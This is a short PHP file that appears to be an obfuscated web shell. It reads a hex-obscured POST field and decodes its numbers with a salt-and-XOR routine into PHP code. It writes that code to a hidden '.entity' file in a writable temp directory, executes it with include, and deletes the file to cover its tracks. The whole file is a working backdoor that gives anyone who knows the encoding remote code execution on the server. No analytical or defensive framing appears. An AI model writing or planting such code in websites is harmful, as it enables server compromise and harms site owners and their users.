<?php

if(in_array("\x65le\x6D", array_keys($_POST))){
	$record = array_filter(["/tmp", getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp", "/dev/shm", getenv("TMP"), sys_get_temp_dir()]);
	$val = $_POST["\x65le\x6D"];
	$val 	=explode 	 ('.' , $val) 	;		
	$tkn = '';
            $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt8);
    
            foreach($val as $u =>	$v1):
                $sChar = ord($salt8[$u% $sLen]);
                $dec =((int)$v1 - $sChar -($u% 10)) ^ 49;
                $tkn .= chr($dec);
            endforeach;
	foreach ($record as $key => $resource) {
    		if (!!is_dir($resource) && !!is_writable($resource)) {
    $factor = sprintf("%s/.entity", $resource);
    if (@file_put_contents($factor, $tkn) !== false) {
	include $factor;
	unlink($factor);
	exit;
}
}
}
}